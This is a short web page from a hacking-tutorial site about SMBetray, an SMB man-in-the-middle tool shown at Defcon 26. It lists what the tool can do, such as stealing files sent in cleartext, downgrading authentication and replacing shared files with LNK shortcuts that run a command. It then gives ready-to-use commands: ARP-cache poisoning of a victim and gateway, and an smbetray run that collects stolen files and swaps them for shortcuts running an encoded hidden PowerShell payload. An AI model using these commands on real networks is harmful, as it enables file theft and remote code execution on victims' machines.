Ethical Hacking Tutorials

Ethical Hacking Tutorials, Tips and Tricks

SMBetray – Backdooring and Breaking Signatures


Finally, since encryption is rarely ever used, at the bare minimum this tool allows for the stealing of files passed in cleartext over the network – which can prove useful for system enumeration, or damaging if the data intercepted is sensitive in nature (PCI, PII, etc).

Released at Defcon26 at “SMBetray – Backdooring and Breaking Signatures”

 

 

  • Passively download any file sent over the wire in cleartext
  • Downgrade clients to NTLMv2 instead of Kerberos
  • Inject files into directories when view by a client
  • Replace all files with a LNK with the same name to execute a provided command upon clicking
  • Replace only executable files with a LNK with the same name to execute a provided command upon clicking
  • Replace files with extension X with the contents of the file with extension X in the local provided directory
  • Replace files with the case-insensitive name X with the contents of the file sharing hte same name in the provided directory

 

Installation

Requires a system using iptables

sudo bash install.sh 

 

Usage

First, run a bi-directional arp-cache poisoning attack between your victim, and their gateway or destination network shares, eg:

sudo arpspoof -i <iface> -c both -t <target_ip> -r <gateway_ip>

Then run smbetray with some attack modules

sudo ./smbetray.py --passive ./StolenFilesFolder --lnkSwapAll "powershell -noP -sta -w 1 -enc AABCAD....(etc)" -I eth0

 

Backdooring and Breaking Signatures: SMBetray Download

Updated: August 31, 2018 — 4:28 am

Leave a Reply

Your email address will not be published. Required fields are marked *

Ethical Hacking Tutorials © 2018
Skip to toolbar